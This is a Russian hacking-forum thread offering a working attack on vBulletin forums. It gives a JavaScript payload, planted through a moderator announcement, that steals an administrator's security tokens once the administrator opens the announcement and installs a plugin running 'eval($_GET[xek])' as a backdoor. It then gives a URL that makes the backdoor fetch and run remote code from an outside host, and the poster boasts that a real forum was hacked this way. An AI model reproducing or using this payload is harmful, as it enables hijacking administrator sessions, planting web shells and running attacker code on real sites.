1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

shell module html announcement

Тема в разделе "Web-хакинг", создана пользователем Хулиган, 2 авг 2012.

  1. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Нужны прова модера/СМа
    Панель модератора - Объявления - Создать новое объявление
    Текст:
    Код:
    <script type="text/javascript" src="http://code.jquery.com/jquery.min.js"></script>
    <script type="text/javascript">
    	var adminurl = '/admincp/';
    	var src = '';
    	$.get(adminurl + 'plugin.php?do=add',{
    	}, function(data){
    		//alert(data);
    		var adminhash = $(data).find('input[name=adminhash]').val();
    		var securitytoken = $(data).find('input[name=securitytoken]').val();
    		$.post(adminurl + 'plugin.php?do=update', {
    			'do' : 'update',
    			'adminhash': adminhash,
    			'securitytoken': securitytoken,
    			'product':'vbulletin',
    			'hookname':'faq_complete',
    			'title':'vBulleltin',
    			'executionorder':'1',
    			'phpcode':'eval($_GET[xek]);',
    			'active':'1',
    			'pluginid':''
    		}, function(sdata){
    			//alert(sdata);
    		});
    	});
    	
    
    </script>
    Далее кидаем админу линк на объявление и ждем пока он зайдет в админку.
    ну и наконец
    [noparse]http://host.local/faq.php?xek=eval(file_get_contents('http://xek.local/sell.txt'));[/noparse]
    [noparse]https://h-xn.ru/xnt/shell0.png[/noparse]
    Собсно так и была взломана brutezone Boolean'om)
    the end *mrgreen*
     
    2 авг 2012
  2. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    слито
     
    16 июн 2015
  3. v1nest
    v1nest Выёбистый СМ ^^ Команда форума Глобальный модератор
    Симпатии:
    52
    О Боги, как давно это было..
    Тогда я не думал о безопасности)
     
    19 июн 2015

Поделиться этой страницей

Загрузка...